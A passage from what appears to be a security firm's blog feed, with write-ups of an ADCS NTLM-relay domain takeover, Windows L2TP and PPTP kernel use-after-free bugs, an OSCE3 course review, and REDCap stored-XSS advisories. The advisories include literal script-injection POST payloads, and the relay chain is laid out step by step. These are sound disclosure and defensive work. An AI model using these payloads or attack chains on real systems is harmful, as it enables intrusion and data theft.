In the summer of 2021, SpecterOps researchers Will Schroeder and Lee Christensen published a deluge of information on the attack potential in inherently insecure Active Directory Certificate Services (hereafter ADCS, essentially Microsoft’s PKI implementation). While a full discussion of the eight attack mappings (ESC1 through ESC8) is outside of the scope of this blog post, it is worthwhile to explore ESC8 further as it stands as an excellent recent example of the continued potential for domain compromise that NTLM relay poses.

Essentially, this vulnerability arises from the fact that the web interface of the ADCS allows NTLM authentication and does not enforce relay mitigations by default. If the certificate authority in the domain does indeed have the web enrolment feature enabled (which is typically exposed via http://<CA_SERVER>/certsrv/ once the Certificate Authority Web Enrolment role is installed on the server), then the attacker can carry out an NTLM relay to the HTTP endpoint. Per the linked SpecterOps resource:

“This attack, like all NTLM relay attacks, requires a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, but a simple technique is to coerce a machine account to authenticate to the attacker’s host using the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) methods using a tool like SpoolSample or Petitpotam. The attacker can then use NTLM relay to impersonate the machine account and request a client authentication certificate (e.g., the default Machine/Computer template) as the victim machine account. If the victim machine account can perform privileged actions such as domain replication (e.g., domain controllers or Exchange servers), the attacker could use this certificate to compromise the domain. Otherwise, the attacker could logon as the victim machine account and use S4U2Self as previously described to access the victim machine’s host OS.”

With the theory out of the way, let’s see this attack in action. First, from their initial foothold on the client01 machine as a low-privileged user, the attacker can utilize the living-off-the-land binaries, like certutil.exe, to enumerate certificate authorities in the domain:

From here, the attacker can set up ntlmrelayx to forward incoming forced authentications from DC01 to the HTTP endpoint for certificate enrolment; note that ExAndroidDev’s fork of Impacket with support for ADCS exploitation was utilized for this demonstration:

As the final step in the attack chain, the PowerShell implementation of PetitPotam is leveraged in order to coerce an authentication from DC01 to our relay server:

At this point, the CA issues a certificate for the DC01$ computer account, which is captured by the ntlmrelayx server:

Now that the hard work is done, from here, with the base64 certificate of the domain controller computer account in hand, the attacker can use Rubeus to request a Kerberos TGT for the DC01$ computer account and can now perform a DCSync to request the NTLM hash of the krbtgt user to achieve complete domain compromise and persistence.

Mitigations:

  1. Prior to releasing the offensive tooling for ADCS exploitation, SpecterOps released the PSPKIAudit auditing toolkit to enable defenders to proactively monitor their environments for potential ADCS misconfigurations. Please do recall that there are seven other scenarios for ADCS abuse which are outlined in the original SpecterOps whitepaper and not discussed in this blog post, so concerned blue team individuals are encouraged to read more here.
  2. Alongside reviewing the aforementioned resources, it is highly recommended that defenders enumerate the Web Enrolment interfaces in their environment (either with or without PSPKIAudit) and either enforce HTTPS and enable EPA on the IIS server endpoints or remove the endpoints if possible altogether.
  3. If not already doing so, defenders are encouraged to treat CA servers as tier 0 assets along with domain controllers from an asset management standpoint.

Conclusion

Owing to the fact that an attacker would need to have successfully leveraged another server-side vulnerability or a social-engineering attack to be in the position to relay credentials as a man-in-the-middle, hardening domain authentication and superfluous network broadcast traffic stands as an important component of Defence in Depth (DiD). While Microsoft may have worked to address the impact of some of these relay issues at different levels, it is nonetheless paramount that network administrators and defenders do their part to blunt the force of these vectors to potential domain takeover by following the mitigation advice on the subject. As there is no silver bullet to pre-emptively thwart every network attack primitive, the remedial guidance contained in this article can be followed as part of the multifaceted approach of DiD to secure the digital estate from domain compromise. Nettitude’s specialized internal infrastructure penetration testing services can also provide network stakeholders with world-class technical knowledge and tailored advice on remediating the issues explored here and beyond.

CVE-2022-30211: Windows L2TP VPN Memory Leak and Use after Free Vulnerability

17 August 2022 at 09:00

Nettitude discovered a Memory Leak turned Use after Free (UaF) bug in the Microsoft implementation of the L2TP VPN protocol. The vulnerability affects most server and desktop versions of Windows, dating back to Windows Server 2008 and Windows 7 respectively. This could result in a Denial of Service (DoS) condition or could potentially be exploited to achieve Remote Code Execution (RCE).

Please see the official Microsoft advisory for full details:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30211

L2TP is a relatively uncommonly used protocol and sits behind an IPSEC authenticated tunnel by default, making the chances of seeing this bug in the wild extremely low. Despite the low likelihood of exploitation, analysis of this bug demonstrates interesting adverse effects of code which was designed to actually mitigate security risk.

L2TP and IPSEC

The default way to interact with an L2TP VPN on Windows Server is by first establishing an IPSEC tunnel to encrypt the traffic. For the purposes of providing a minimalistic proof of concept, I tested against Windows Server with the IPSEC tunnelling layer disabled, interacting directly with the L2TP driver. Please note however, it is still possible to trigger this bug over an IPSEC tunnelled connection.

For curious readers, disabling IPSEC can be achieved by setting the ProhibitIpSec DWORD registry key with a value of 1 under the following registry path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters\

This will disable IPSEC tunnelling and allow L2TP to be interacted with directly over UDP. Not to discourage a full IPSEC + L2TP solution, but it does make testing the L2TP driver a great deal easier!

Vulnerability Details

The bug in question is a reference increment bug located in the rasl2tp.sys L2TP VPN protocol driver, and relates to how tunnel context structures are reused. Each established tunnel for a connection is allocated a context structure, and a unique tunnel is considered to be the pairing of both a unique tunnel ID and UDP + IP address.

When a client initiates an L2TP StartControlConnectionRequest for a tunnel ID that they have previously used on a source IP and port that the server has already seen, the rasl2tp driver will attempt to reuse a previously allocated structure as long as it is not in an unusable state or already freed. This functionality is handled by the SetupTunnel function when a StartControlConnectionRequest is made with no tunnel or session ID specified in the L2TP Header, and an assigned tunnel ID matching one that has already been used.

Pseudo code for the vulnerable section is as follows:

if ( !lpL2tpHeaderHasTunnelID )
{
   // Tunnel Lookup function uses UDP address information as well as TunnelID to match a previous Tunnel Context structure
   NewTunnel = TunnelCbFromIpAddressAndAssignedTunnelId(lpAdapterCtx, lpSockAddr, lpTunnelId);
   if ( NewTunnel ) // if a match is found a pointer is returned else the return is NULL
   {
      if...
      ReferenceTunnel(NewTunnel, 1); // This is the vulnerable reference count
      KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
      return NewTunnel;
   }
}

The issue is that the reference count does not have an appropriate dereference anywhere in the code. This means that it is possible for a malicious client to continually send StartControlConnectionRequests to increment the value indefinitely.

This creates two separate vulnerable conditions. Firstly, because the reference count can be far greater than it should be, it is possible for an attacker to abuse the issue to exhaust the memory resources of the server by spoofing numerous IP address and tunnel ID combinations and sending several StartControlConnectionRequests. This would keep the structures alive indefinitely until the server’s resources are exhausted, causing a denial of service. This process can be amplified across many nodes to accelerate the process of consuming server resources and is only limited by the bandwidth capacity of the server. In reality, this process may also be limited by other factors applied to network traffic before the L2TP protocol is handled.

The second vulnerable condition is due to logic in the DereferenceTunnel function responsible for removing tunnel references and initiating the underlying free operation. It is possible to turn this issue into a Use after Free (UaF) vulnerability, which could potentially then be used to achieve Remote Code Execution.

Some pseudo code for the logic that allows this to happen in the DereferenceTunnel function is as follows:

__int64 __fastcall DereferenceTunnel(TunnelCtx *TunnelCtx)
{
   ...

   lpAdapterCtx = TunnelCtx->AdapterCtx;
   lpTunnelCtx = TunnelCtx;
   lpAdapterCtx->TunnelCurIRQL = KeAcquireSpinLockRaiseToDpc(&lpAdapterCtx->TunnelLock);
   RefCount = --lpTunnelCtx->TunnelRefCount;
   if ( !RefCount )
   {
      // This code path properly removes the Tunnel Context from a global linked list and handles state termination
      ...
   }
   KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
   if ( RefCount > 0 ) // This line is vulnerable to a signed integer overflow
      return (unsigned int)RefCount;
   ...
   lpTunnelCtx->TunnelTag = '0T2L';
   ExFreePoolWithTag(&lpTunnelCtx[-1].TunnelVcListIRQL, 0);
   ...
   return 0i64;
}

The second check of the reference count that would normally cause the function to return uses a signed integer for the reference count variable. This means using the reference increment bug we can cause the reference count value to overflow and become a negative number. This would cause the DereferenceTunnel function to free the target tunnel context structure without removing it from the global linked list.
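
To make the signed overflow concrete, the short TypeScript snippet below simulates a 32-bit signed reference count using JavaScript's 32-bit integer coercion. It only illustrates the arithmetic, not the driver's actual code.

// Once a 32-bit signed counter is incremented past 0x7FFFFFFF it wraps negative,
// so a guard such as `if (RefCount > 0) return;` no longer prevents the free.
let refCount = 0x7fffffff;     // INT_MAX, reached after many spoofed requests
refCount = (refCount + 1) | 0; // force 32-bit signed wrap-around
console.log(refCount);         // -2147483648
console.log(refCount > 0);     // false -> the early return is skipped and the free proceeds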

The global linked list in question is used to store all the active tunnel context structures. When a UDP packet is handled, this global linked list is used to lookup the appropriate tunnel structure. If a freed structure was still present in the list, any UDP packet referencing the freed context structure’s ID would be able to gain access to the freed structure and could be used to further corrupt kernel memory.

Exploitation

Exploitation of this bug outside of just exhausting the memory resources of a target server could take a very long time and I suspect would not realistically be exploitable or viable. Since a reference count can only happen once per UDP packet and each UDP message has to be large enough to contain all prior network stack frames and the required L2TP (and IPSEC) messages, the total required throughput is huge and would almost definitely be detected as a denial of service (DoS) attack long before reaching the required reference count.

Conclusion

This leaves the question: why would a developer allow a reference count to be handled in this way, when it should only ever require a minimum value of 0?

The main reason for allowing a reference count to become a negative number is to account or check for code that over-removes references, which would typically result in an unsigned overflow. This kind of programming is a way of mitigating the risk posed by the more likely situation in which a reference count is over-decremented. However, a direct result is that the opposite situation then becomes much more exploitable, and in this scenario results in a potential for remote code execution (RCE).

Despite this, the mitigation is still generally effective, and the precursors for exploitation of this issue are unlikely to be realistically exploitable. In a way, the intended mitigation works because even though the maximum possible impact is far greater, the likelihood of exploitation is far lower.

Timeline

  • Vulnerability Reported To Microsoft – 20 April 2022
  • Vulnerability Acknowledged – 20 April 2022
  • Patch In Development – 23 June 2022
  • Patch Released – 12 July 2022

Offensive Security: From OSCE to OSCE3

8 August 2022 at 16:16

OSCE3 (Offensive Security Certified Expert 3) is a certification from Offensive Security which has replaced the (now retired) OSCE certification. This post explores a pentester’s journey from being OSCE certified to becoming OSCE3 certified.

Way back in the halcyon year of 2012, I received the OSCE certification from Offensive Security. At the time, it was regarded as one of the more difficult to obtain certifications and required an in-depth knowledge of several deep technical subjects. These included advanced (at the time) web application hacking, advanced (at the time) shellcoding skills, and advanced (at the time) fuzzing and exploit creation skills.

Upon obtaining the OSCE certification, it was quite easy to show that one had a myriad of skills in the security world and would be able to pentest, or at least be able to hack their way out of a paper bag. However, the security world marches on, and techniques become obsolete or outdated – or in this case, both. What was once considered cutting edge generalist training became a shadow of its former self.

Introducing: Offensive Security Certified Expert 3 (OSCE3)

Fortunately, Offensive Security was aware of this, and recently revamped the OSCE training and certification into far more in-depth and relevant courses. It was split into three separate trainings: Advanced Web Attacks and Exploitation, which has the OSWE certificate, Evasion Techniques and Breaching Defenses, which has the OSEP certificate, and Windows User Mode Exploit Development, which has the OSED certificate. Obtaining all three would give the OSCE3 certificate, which is the new and improved version of the OSCE that I had originally obtained.

I decided that I was going to update my certification status. I was interested both in the advanced training that was offered, and in seeing if all of the security experience I had gained in the meantime made it relevant for me to obtain. Meaning, yeah, I would get some shiny letters, but would it actually up my game? With that in mind, I jumped into the training, eventually receiving all three of the certifications and obtaining my OSCE3, with the final certificate earned 11 months after my first was earned.

What follows is my review of the three courses, with a particular eye towards their relevancy to those who have already been pentesters for a while.

Offensive Security Web Expert (OSWE/WEB-300)

Advanced Web Attacks and Exploitation (referred to as AWAE or WEB-300) is an advanced web attack course that replaces the (admittedly minor) web portion of OSCE. Those who complete the course and pass the exam earn the Offensive Security Web Expert (OSWE) certification. While both courses dealt with reading the source code of a web application and finding a vulnerability, the OSCE version seemed more of an afterthought than a core part of the course. AWAE is designed to change all of that, bringing in a fully fleshed-out course dealing with code review and exploit creation on the web.

And, oh boy, does it ever! There are some basic topics that are taken much further, like XSS and SQL injection. Every tester should know how to exploit them, but the course helps bring more interesting payloads and shift direction on basic exploitation to kick it up a notch. While everyone can drop a BeEF payload and hope it works, or fake a password form for XSS, there is so much more to do, and the content really helps bring that mindset across. Application specific payloads are the norm, and while the exact use cases are not going to be as easily replicated as the studies in the labs, the mindset shift of “Let’s put in the password form in the XSS field” to “What is the most impactful action we can take on the application, and how can I code the payload to do it?” is a fantastic step forward.

And that’s not even the best part. The best part of the AWAE course, where it truly shines? The more niche and unique topics. Deserialization, SSRF, CORS, and more are all explained *thoroughly*. Where perhaps in other courses the explanation was too much, in this one, there is just enough to get all of the nuances across without overloading with useless information.

The proofs of concept are also fantastic. Some of them are contrived, like the CORS payloads, in order to prove the point, but the vast majority of them are works of art explaining how to comprehensively exploit an application. The code created in the course is generally portable and adaptable, so once created, the proof of concept can work for you forever. That’s service.

Of the modules in the material, I think I enjoyed the deserialization the most. Before AWAE, while I could scan and potentially exploit these issues, there were definitely parts I did not understand. However, with the thorough, step by step explanations in the course, every mystery was laid to rest, and it became second nature. In fact, in a live engagement during the course, I was able to pull down an executable from Citrix via a breakout exploit. Upon examining the code, I found an unsafe deserialization in how it handled clipboard data. Several hours of Googling to find a program to edit the hex values and attributes of clipboard data later, I had a simple copy/paste payload that would trigger a shell on the Citrix server. I’ll be honest, before the course, I likely would not have been able to craft that payload, and would have left exploitation as an exercise to the reader.

There are three challenge labs in AWAE, each of which highlights various portions of the course. However, I took the course before the labs were released, so I do not have comments on them. From my activity on the forums and OffSec Discord, I hear good things.

I will hold my comments on the format of the exam, other than to say that of all the OffSec exams, it felt the most real world. At no point did I feel that an obstacle was artificial, and all were overcome the way I would have done it in a live pentest.

There are, of course, some areas where I felt the AWAE course could do with further development. At times it was hard to follow along in the PDF and videos, and making changes to code to add the next step in the PoC scripts can be awkward. Sometimes that requires moving to the forums or Discord, only to be told that there was a minor error in the code, which can get frustrating. Connectivity to the apps can also be an issue, with certain requests hanging because of the VPN or the like. While these issues exist, they do not lower the quality of the learning.

The real-world value of this course, even for an experienced tester, is fantastic. Deeper understanding, better payloads, faster outcomes, and more. This is definitely a course to take to up your game to the next level.

Offensive Security Experienced Penetration Tester (OSEP/PEN-300)

Geared as an advanced infrastructure course, OSEP aims to replace the second leg of the tripod that was OSCE and its materials. The core it seeks to replace was the very spindly leg of creating code-caves and custom XOR encoding schemes.

At its core, OSEP teaches Active Directory fundamentals, antivirus evasion, and lateral movement techniques that are seen everywhere today – and I would say it does an excellent job.

Each module can be characterized by the following path: a technique is discussed, broken down into its individual parts of how and, much more importantly, *WHY* it works, and then implemented. This breakdown is fantastic in all 17 of the modules in the course. At times, the breakdown of the Why is not as important as the How, especially given that, sometimes, a few sentences past a long-winded explanation of Why, we are told to use another tool that does it all for us silently. Even so, walking away with more fundamental knowledge is what allows us to grow as pentesters, and is not something to pass up. In the end, each student will have to decide on their own if the Why is as important to them as the How. My advice? It is. Spend time understanding and digesting the Why and doing the extra miles in order to gain the most out of the course.

Certain modules delved into tremendous depth in niche cases that were not necessarily relevant, such as Linux breakouts, or were quick on things that may have benefited from more time, such as proxying and domain fronting. While the former could have been better served with a Citrix breakout instead of Linux, in the end it was a fascinating module, and I would not want it changed – perhaps expanded to include RDWeb and Citrix, but certainly not reduced. The domain fronting content is relatively short due to technical limitations and new security measures in the usual domain fronting services, so I understand why it was kept brief. Even so, perhaps another, more intense lab would have helped drive home the concepts.

In terms of real-world value, there is no substitution for the OSEP course. Even during studying I was immediately able to put techniques learned into practice, including getting Domain Administrator privileges on two domains that were previously uncracked, using lateral movement techniques, and assisting a colleague with a CLM and AppLocker bypass. Combining the tools with the advanced AV evasion techniques meant that I had a fully homegrown tool that can bypass AV, AMSI, PowerShell CLM, and AppLocker – even on a fully patched and protected modern OS. The satisfaction of watching a command shell with no restriction pop up when a co-worker swears it cannot be done is not to be understated – it’s awesome.

The tool, shown below, hijacks a thread of notepad and runs a reverse shell (not shown). I take no credit for any of the research – I merely ported some sections of C++ to C# and combined several techniques into one.

The tool was created to be nothing more than a showcase of various techniques, and is overkill for actual use. If used in the wild, I recommend the following: don’t. If you must, then choose a single technique and work with that. The tool pictured above works to bypass everything, but is completely unnecessary and not good for any stealth or long-term AV bypass.

Of the course tracks, I’m torn between lateral movement and AV evasion. In theory, lateral movement is fun, but it is limited in the real world, where domains are so often hacked with Responder or Kerberoasting or other “single step to DA” techniques. In practice, AV evasion is a never-ending cat and mouse cycle that consistently allows us to up our game and create better tools. On the whole, I would probably say AV evasion helped up my tooling and coding game the most. See below for a real-world screenshot of me avoiding AV.

(Image: the T-1000 walking through the jail bars in Terminator 2 – a moment Robert Patrick improvised, surprising the cast.)

The course also has six challenge labs of varying difficulty in order to refine tools and techniques. They are genuinely fantastic and I wish there were more. The challenges each took a few hours to complete, even challenge one, where I went down so many rabbit holes that Alice would be ashamed of me. The general sense was that each challenge took about 4-6 hours, and if there was any point that I was stuck, I had the forums and discord to help me out. Once done, I used the extra time in the labs to refine my tooling, until I had a fully AV+CLM+AMSI+Applocker bypassing version of each shellcode runner (doc, exe, js, vbs, hta, etc), process injection, process hollowing, and other tools that were created in the course of the modules. This came in very handy in exam time when I didn’t need to worry about any protections in place, confident that what I had written would fly invisible and under the radar.

I will withhold my comments about the exam, only saying that it mimics the real world more than the labs, and sometimes the people who create networks make exactly the errors you would think they do.

As far as areas for development with the OSEP course, I would say the main one would be the reliability of the labs. Sometimes, techniques that had worked perfectly a few minutes earlier would fail and require a revert. Other times, services would not be available or accessible as necessary, requiring the labs to be reverted 5-6 times. Additionally, some techniques in the course overlook tools that are in every internal infrastructure hacker’s arsenal, in favor of out-of-date or obsolete versions.

All things considered though, PEN-300 was a fantastic course with immediate returns in my day-to-day pentesting, and I highly recommend it for a more in-depth understanding of attack chains and tooling. Do yourself a favor and buy the course.

Offensive Security Exploit Developer (OSED/EXP-301)

The final course in the OSCE3 triad, Windows User Mode Exploit Development (referred to as EXP-301), is the replacement of the main attraction of OSCE. Where the old Cracking the Perimeter (CTP) course shone was in its exploitation and shellcoding portions. EXP-301 takes that and turns it up to 11. It just goes *hard*.

Back in the CTP days, mitigations like ASLR were covered in the course, but in a contrived minor way to show the possibility of a bypass, and DEP wasn’t covered at all. That is not the case anymore. Each of these topics is dealt with in absurd depth. Multiple times. In multiple ways. Once the inner workings of the protections are explained, it’s a very short time before the student is happily crafting leaks and ROP chains. But that’s not all.


There are two more areas where the course shines – reverse engineering and shellcoding. Let’s take them one by one. Reverse engineering is a complex topic – there are multiple ways to go about it, and the course chooses to focus on static reversing with IDA coupled with dynamic analysis in WinDbg. And it works. Complex programs are taken apart in a way that is easily digestible and understood by the student. Students have to go the extra mile with reverse engineering on multiple occasions, but all challenges are doable, if slightly difficult at times. The knowledge of how to work with those two imposing programs is a huge plus of the course, since it takes these two behemoths and demystifies them for common use. Taking apart programs is fun, and really makes me appreciate .NET and DNSpy for my usual day to day.

The shellcoding aspect of the course is likewise a well-done portion. The reverse shell that is created and optimized is perfectly usable in the real world. And the techniques are also easily portable to the real world, as I found to my glee when I needed some quick shellcode to drop in an engagement. Plus, understanding how and why things are done the way they are helps with changing MSF shellcode or others. Inline ASM in C is likewise turned into a cinch, once the knowledge is there.

The course also covers format strings, but since those attacks are more or less disappearing, I won’t spend too much time on them other than to say that using a format string to leak an address is lots of fun.

All of these things, reverse engineering and ASLR bypass and DEP bypass and stack overflows and SEH overflows and shellcode creation and format strings, are practiced on this one program that just has every vulnerability ever. That is a little contrived, but it does mean that the student has the ability to truly understand the target and even take it further to find their own vulnerabilities in the exe, so I am counting that as a plus.

The area of the course I enjoyed the most would likely be module 10, where we combined ASLR and DEP bypasses in a single exploit.

The joy of seeing a reverse shell pop after fully reverse engineering and crafting an exploit all by yourself on an extra mile cannot be overstated. I don’t think I have ever felt more like a hacker than when an 80-gadget ROP chain that I crafted using Sublime Text and no debugger popped me a shell on the first try with no errors.

There are multiple ways to do everything, so you can set yourself an additional challenge by shifting the bypass method from the one outlined in the course to one of your own choosing, which is a great way to practice.

There are three challenges in the course. They all touch on various aspects of the course, but do not really overlap much. I personally only did challenges one and two, not getting a full shell with challenge three before I passed the exam. However, challenges one and two were loads of fun. I do believe they are necessary, and I definitely think that all of the extra miles in this course are needed to be able to pass the exam.

I won’t say much about the exam, other than that it was a significantly difficult endeavor. Do not get discouraged by the goals, as there are many ways to achieve them. My own solutions were not the intended ones and saved me a huge amount of effort, which just proves there are different ways to do things.

However, there are some fairly glaring omissions from the course – x86 is not going to be the average user’s architecture, and creating exploits for it seems like a tee-ball league version of hacking versus true major league hacking. Also, much of the course feels like a blueprint was given for the concepts, and then we are pushed into the deep end. The exam certainly felt like that, but it *is* the exam, so it’s understandable. In terms of real-world value, this is harder to say. The course is fantastic, but x86 is not really used any more – so for practical exploitation, use this course as a jumping-off point to x64. However, if your aim is to understand concepts and put them to use in other areas of the hacking world, this is a fantastic entry point into these kinds of topics. All in all, I would say the course is worth taking.

Conclusion

After having taken all three of the replacement courses, I came to the conclusion that upgrading the certificate was definitely a great idea. I learned a huge amount in each area and put it to use almost immediately in all cases. I would encourage even experienced testers to go ahead and grab the training.

I would say that for OffSec, there are effectively two things here: the training and the certificate. Even if you choose not to take the exam, the course itself is extremely high value and you won’t walk away feeling like you are missing out. If it’s not an option to take all three courses, then choose the one most relevant to your day-to-day testing and get on it. They are all excellent, and worth the effort of Trying Harder.

Also, the challenge coin for OSCE3 is pretty sweet, so that’s a fun goal to go for. In the end, I feel like taking the courses made me a better pentester in all of the areas covered.

The post Offensive Security: From OSCE to OSCE3 appeared first on Nettitude Labs.

CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting

15 June 2022 at 09:00

Nettitude identified two stored Cross Site Scripting (XSS) vulnerabilities within Vanderbilt REDCap.  These have been assigned CVE-2022-24004 & CVE-2022-24127.

REDCap is a web application which allows the creation and management of online surveys for research purposes. Version 12.0.11 and below allows a remote authenticated attacker to inject arbitrary JavaScript or HTML via the Messenger functionality and the administration interface.

CVE-2022-24004 – Proof of Concept

REDCap has a built-in messenger function which allows all registered users to communicate within the application. Each conversation has a title which can only be edited by the user who originally created the conversation. The input field where this title is edited does not filter input and, as a result, it is possible to inject malicious JavaScript and HTML.

Example POST data sent to Messenger_ajax.php:

action=change-conversationtitle&thread_id=7&new_title=%22+onclick%3Dalert(document.location)+&username=m17664jp&limit=8&redcap_csrf_token=1c5c586a0e3d614dfba3401a1dd92f508d4f915a

This payload will then trigger in the browser of any user who is a participant in the conversation, whenever the messenger sidebar is toggled. The following screenshot shows that the payload is injected into the data-tooltip parameter of the h4 tag.

For this simple proof of concept, the user would have to click on the message title, resulting in the execution of a JavaScript alert.


The impact of this vulnerability could lead to the disclosure of sensitive application and survey data. Given that the messenger functionality will autocomplete usernames after providing the first character, it is possible to see how an attacker could create a conversation with all application users to maximise chances of compromising application data from an administrator user.

Nettitude demonstrated the impact of this to the application vendor by further improving the proof of concept to automatically trigger on page load and scrape the contents of the user’s screen, sending this data to a remote server.

CVE-2022-24004 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: Messenger_ajax.php
  • Vulnerable parameter: new_title

CVE-2022-24127 – Proof of Concept

In the project administration section of the application, admin users that have permissions to modify a project can modify the project title. The input field where this value is modified does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST Data sent to edit_project_settings.php:

surveys_enabled=1&repeatforms=0&scheduling=0&randomization=0&app_title=a%3C%2Ftitle%3E%3Cscript%3Ealert%28document.location%29%3C%2Fscript%3E&purpose=0&project_pi_firstname=&project_pi_mi=&project_pi_lastname=&project_pi_email=&project_pi_alias=&project_irb_number=&purpose_other=&project_note=test&projecttype=on&repeatforms_chk=on&redcap_csrf_token=9158988d73045f982cb373f607a607022391e1df

Once the project title is modified, the user is returned to the project administration home page where the payload immediately triggers and will continue to be executed across all administration pages related to the project.


This code execution is triggered due to the project title being reflected in the page <title> tag. If a user enters a value which first closes the tag, then any further HTML or JavaScript can be executed as shown in the following screenshot.


The impact of this vulnerability is reduced because it would require the attacker to have existing access as a user with project administration permissions. An attacker could potentially exploit this issue to redirect the user to a malicious website controlled by the attacker, which may ultimately lead to credential harvesting or the downloading of malware.

CVE-2022-24127 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: edit_project_settings.php
  • Vulnerable parameter: app_title

Conclusion

User input accepted and stored by any area of a web application should not be trusted. Appropriate measures should be taken to sanitize or encode data before it is included in a later browser response.

Nettitude contacted Vanderbilt to disclose these vulnerabilities. Remediation was put in place almost immediately post-disclosure and a remediated version (12.0.13) was promptly released.


Timeline – CVE-2022-24004

  1. Discovered by Nettitude: 25 January 2022
  2. Vendor informed: 26 January 2022
  3. CVE Assigned: 26 January 2022
  4. Vendor fix released: 28 January 2022
  5. Nettitude Blog: 15 June 2022

Timeline – CVE-2022-24127

  1. Discovered by Nettitude: 28 January 2022
  2. Vendor informed: 28 January 2022
  3. Vendor fix released: 28 January 2022
  4. CVE assigned: 29 January 2022
  5. Nettitude Blog: 15 June 2022

 

The post CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting appeared first on Nettitude Labs.

CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2)

11 May 2022 at 09:00

Following yesterday’s Microsoft VPN vulnerability, today we’re presenting CVE-2022-23270, which is another Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering and fuzzing the raspptp.sys kernel driver. This presents attackers with another chance to perform denial of service and potentially even achieve remote code execution against a target server.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions, check the official disclosure post on MSRC.

The vulnerability affects both server and client use cases of the raspptp.sys driver and can potentially be triggered in both cases. This blog post will focus on triggering the vulnerability against a server target.

Introduction

CVE-2022-23270 is heavily dependent on the implementation of the Winsock Kernel (WSK) layer in raspptp.sys to be successfully triggered. If you want to learn more about the internals of raspptp.sys and how it interacts with WSK, we suggest you read our write-up for CVE-2022-21972 (Part 1 of this series) before continuing.

CVE-2022-23270 is a Use after Free (UaF), resulting in a double free, that occurs as the result of a race condition. It resides in the implementation of PPTP Calls in the raspptp.sys driver.

PPTP implements two sockets: a TCP control connection and a GRE data connection. Calls are set up and managed by the control connection and are used to identify individual data streams handled by the GRE connection. The Call functionality makes it easy for PPTP to multiplex multiple different streams of VPN data over one connection.

Now that we know in simple terms what PPTP calls are, let’s see how they can be broken!

The Vulnerability

This section explores the underlying vulnerability.  We will then move on to triggering the vulnerable code on the target.

PPTP Call Context Objects

PPTP calls can be created through an IncomingCallRequest or an OutgoingCallRequest control message. The raspptp.sys driver creates a call context structure when either of these call requests is initiated by a connected PPTP client. The call context structures are designed to be used for tracking information and buffering GRE data for a call connection. For this vulnerability, the construction of these objects by raspptp.sys is unimportant; we instead care about how they are accessed.

Accessing the Call Context

There are two ways in which handling a PPTP control message can retrieve a call context structure. Both methods require the client to know the associated call ID for the call context structure. This ID is randomly generated by the server and sent to the client within the reply to the Incoming or Outgoing call request. The client then uses that ID in all subsequent control messages sent to the server that relate to that specific call. See the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637) for more information on how this is handled.
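
For orientation, the sketch below approximates the layout of the RFC 2637 Outgoing-Call-Reply message, which is where this call ID travels. The field names and widths are paraphrased from the RFC for illustration only and are not taken from raspptp.sys itself:

#include <stdint.h>

/* Approximate RFC 2637 Outgoing-Call-Reply layout, for illustration only.
 * Field names/widths are paraphrased from the RFC; all fields are
 * big-endian on the wire. */
#pragma pack(push, 1)
typedef struct _PPTP_OUT_CALL_REPLY {
    uint16_t Length;              /* total control message length            */
    uint16_t PptpMessageType;     /* 1 = control message                     */
    uint32_t MagicCookie;         /* fixed value 0x1A2B3C4D                  */
    uint16_t ControlMessageType;  /* 8 = Outgoing-Call-Reply                 */
    uint16_t Reserved0;
    uint16_t CallId;              /* the ID later used to look the call up   */
    uint16_t PeerCallId;          /* call ID taken from the request          */
    uint8_t  ResultCode;          /* an error value here hits the free path  */
    uint8_t  ErrorCode;
    uint16_t CauseCode;
    uint32_t ConnectSpeed;
    uint16_t RecvWindowSize;
    uint16_t ProcessingDelay;
    uint32_t PhysicalChannelId;
} PPTP_OUT_CALL_REPLY;
#pragma pack(pop)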

raspptp.sys uses two methods to access the call context structures when parsing control messages:

  • Globally accessible Call ID indexed array.
  • PPTP control connection context stored link list.

The difference between these two access methods is scope. The global array can retrieve any call allocated by any control connection, but the linked list only contains calls relating to the control connection containing it.

Let’s go a bit deeper into these access methods and see if they play nicely together…

Linked List Access

The linked list access method is performed through two functions within raspptp.sys: EnumListEntry, which is used to iterate through each member of the control connection’s call linked list, and EnumComplete, which is used to end the current loop and reset state.

while ( 1 )
{
    EnumRecord = EnumListEntry(
        &lpPptpCtlCx->CtlCallDoubleLinkedList,
        (LIST_ENTRY *)&ListIterator,
        &lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);
    if ( !EnumRecord )
        break;
    EnumCallCtx = (CtlCall *)(EnumRecord - 2);
    if ( EnumRecord != (PVOID *)16 && EnumCallCtx->CallAllocTag == 'CPTP' )
        CallEventOutboundTunnelEstablished(EnumCallCtx);
}
Iterator = (LIST_ENTRY *)&ListIterator;
EnumComplete(Iterator, (KSPIN_LOCK)&lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);

The ListIterator variable is used to store the current linked list entry that has been reached, so that the loop can continue from this point on the next call to EnumListEntry. EnumComplete simply resets the ListIterator variable once it is finished with. The way in which this code appears in the raspptp.sys driver can change around slightly, but the overall method is the same: call EnumListEntry repeatedly until it returns NULL and then call EnumComplete to tidy up the iterator.

Global Call Array

The global array access method is handled through a function called CallGetCall:

CtlCall *__fastcall CallGetCall(PptpAdapterContext *AdapterCtx, unsigned __int64 CallId)
{
    PptpAdapterContext *lpAdapterCtx;
    unsigned __int64 lpCallId;
    CtlCall *CallEntry;
    KIRQL curAdaperIRQL;
    unsigned __int64 BaseCallID;
    unsigned __int64 CallIdMaskApplied;

    lpAdapterCtx = AdapterCtx;
    lpCallId = CallId;
